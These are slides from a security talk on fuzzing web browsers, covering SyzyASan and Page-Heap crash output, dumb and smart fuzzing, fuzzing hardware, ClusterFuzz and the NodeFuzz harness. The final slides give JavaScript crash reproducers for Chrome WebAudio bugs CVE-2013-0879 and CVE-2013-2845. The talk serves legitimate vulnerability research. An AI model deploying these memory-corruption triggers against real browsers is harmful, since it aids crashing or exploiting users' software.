  • 26. ● Used to instrument binaries ● Redirects heap-related calls to own run- time library ● Currently only heap-instrumentation ● Chrome/Chromium only atm. ● About 3x Slowdown ● Windows only ● https://code.google.com/p/sawbuck/wiki/SyzyASanDesignDocument SyzyASan
  • 27. SyzyASAN error: heap-buffer-overflow on address 0x0379D1A7 (stack_id=0x44CB69D7) READ of size 8 at 0x0379D000 #0 0x000068ef23be in (unknown) #1 0x000068f387f4 in (unknown) #2 0x000068eeb486 in (unknown) #3 0x000068e8add7 in (unknown) . . . SyzyASan
  • 28. Bad access information: +0x000 alloc_stack : [62] 0x0f999970 Void +0x0f8 alloc_stack_size : 0x3c '<' +0x0fc alloc_tid : 0x14a8 +0x100 free_stack : [62] (null) +0x1f8 free_stack_size : 0 '' +0x1fc free_tid : 0 +0x200 error_type : 3 ( HEAP_BUFFER_OVERFLOW ) +0x204 access_mode : 0 ( ASAN_READ_ACCESS ) +0x208 access_size : 8 +0x20c shadow_info : [128] "06499E3F is 23 bytes beyond 384-byte block [06499CA8,06499E28)." +0x290 microseconds_since_free : 0 SyzyASan
  • 30. ● Heap allocation monitoring for Windows ● No feedback - Only crash :( ● “Works” on Chrome/Chromium ● env: CHROME_ALLOCATOR="winheap" ● Enable Chrome error reporting -> minidumps ● Firewall Chrome( No free 0-days for Google ;) ) ● Debugging tools x86 Page-Heap
  • 31. ExceptionAddress: 564a0cd7 (chrome_..!WebCore:: WaveShaperDSPKernel::lazyInitializeOversampling+0x0...06) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 27261fe4 Attempt to read from address 27261fe4 . STACK_TEXT: chrome_...!WebCore::WaveShaperDSPKernel:: lazyInitializeOversampling+0x6 [... webkitsourcemoduleswebaudiowaveshaperdspkernel.cpp @ 53] chrome_...!WebCore::WaveShaperProcessor::setOversample+0x29 . APPLICATION_FAULT_INVALID_POINTER_READ_chrome!WebCore:: WaveShaperDSPKernel::lazyInitializeOversampling+6 Dump-analysis
  • 32. ● Dumb fuzzing ○ Yes, still works ○ Yes, you can still find bugs with bit-flipping of image-files ● Smart fuzzing ○ Finds bugs fast but runs out of bugs faster. :( Fuzzers
  • 33. Dumb fuzzing ● Radamsa || Surku o/ ○ https://code.google.com/p/ouspg/ ● Mutate old repros ( find ./src/ -type d -name *crashtest* | xargs ls; ) ● Collect winnings Fuzzers
  • 34. Smart fuzzing ● W3C/MDN(/MSDN) ● Again stay green ● Most of the JavaScript APIs in browsers are really similar ● Some of the public tools have the logic in them already ● W3C spec + grep + sed = $$$ Fuzzers
  • 35. Smart fuzzing WebAudio API - PannerNode - Specification interface PannerNode : AudioNode { void setPosition(double x, double y, double z); void setOrientation(double x, double y, double z); void setVelocity(double x, double y, double z); attribute double refDistance; attribute double maxDistance; attribute double rolloffFactor; }; Fuzzers
  • 36. Smart fuzzing 2D Canvas API - Specification // rects void clearRect(unrestricted double x, unrestricted double y, unrestricted double w, unrestricted double h); void fillRect(unrestricted double x, unrestricted double y, unrestricted double w, unrestricted double h); // shadows attribute unrestricted double shadowOffsetX; // (default 0) attribute unrestricted double shadowOffsetY; // (default 0) attribute unrestricted double shadowBlur; // (default 0) Fuzzers
  • 37. Individuals: ● Physical machines -> sysadmining <3 ● SSD <3 ● RAM++ ● Vicious cycle of Bug->Bounty->New HW->Bug->Bounty... Hardware/Infrastructure
  • 38. 8x Dual Core CPU, 2GB ram, USB-stick, aka. Badgers OUSPG - 2011
  • 39. University HW: Badgers 6x Quad core AMD A10, 16GB ram, SSD 6x Dual Dual Core AMD antique, 8GB, 10k rpm BYOD: 4x Quad core i7-3770K, 16GB ram, SSD And additional 30+ cores misc hardware with 133.7+ GB of ram and bunch of SSDs OUSPG - 2013
  • 42. ClusterFuzz aka. CF ● Google fuzzing cluster ● 2012 - ○ 6000 Chrome instances ○ 50m+ test cases per day ○ Plans for quadrupling at that time ● ASAN, multiple fuzzers, minimization, regression ranges, verify fixes, dupes & dupes & dupes... Hardware/Infrastructure
  • 43. “cluster-fuzz is a soulless bug hunting machine. It has no want or need for your gratitude. It lives only to feed on bugs.” ClusterFuzz
  • 44. ● 12 machines running 24/7 ● ~50 cores, ~133.7GB of RAM ● approx. 20m test cases per day ● 19 file-formats ● git, scp, auto-update, auto-minimize ● Radamsa and ... My stuff
  • 45. ● Browser fuzzer harness ● Written in JavaScript ( Node.js ) ● Linux, Windows, OS X ● Test case generators and instrumentations loaded as modules ● Uses WebSockets for test case injection to browser ● Stable - https://code.google.com/p/ouspg/downloads/list ● Trunkish - https://github.com/attekett/NodeFuzz NodeFuzz
  • 46. Requirements: Google Chrome installed $ sudo apt-get install nodejs $ git clone https://github.com/attekett/NodeFuzz.git $ cd NodeFuzz $ npm install $ vim config.js #Optional $ node nodefuzz.js NodeFuzz - Setup - Ubuntu
  • 47. ● Fairly new JS API (Chrome 2011, FF 2013) ● "The API has been designed to allow modular routing.(UAF) Basic audio operations are performed by audio nodes that are linked together to form an audio routing graphs.(UAF/BOF) Inside a same context, several sources are supported, with different kind of channel layout.(UAF/BOF) This modular design allows for great flexibility and for the creation of complex audio functions and of dynamic effects. (BOF)" - MDN NodeFuzz - module - WebAudio
  • 48. Bugs found: ● Chrome - 4 UAF, 3 BOF ● Firefox - 1 UAF, 8 BOF NodeFuzz - module - WebAudio
  • 49. CVE-2013-0879 - Chrome - BOF <script> try{var context= new webkitAudioContext()}catch(e){} try{var oscillator= context.createOscillator()}catch(e){} try{oscillator.start(0.701,0.7,0.7)}catch(e){} setInterval(function(){ try{oscillator.connect(context.destination);}catch(e){} },4) try{oscillator.stop(0.70)}catch(e){} </script> NodeFuzz - module - WebAudio
  • 50. CVE-2013-2845 - Chrome - UAF <script> var Context0= new webkitAudioContext() var Analyser0=Context0.createAnalyser(); var WaveShaper0=Context0.createWaveShaper(); var Convolver3=Context0.createConvolver(); Analyser0.connect(WaveShaper0); WaveShaper0.connect(Context0.destination); Convolver3.connect(Analyser0); setInterval(function(){ Analyser0.disconnect(); },4) </script> NodeFuzz - module - WebAudio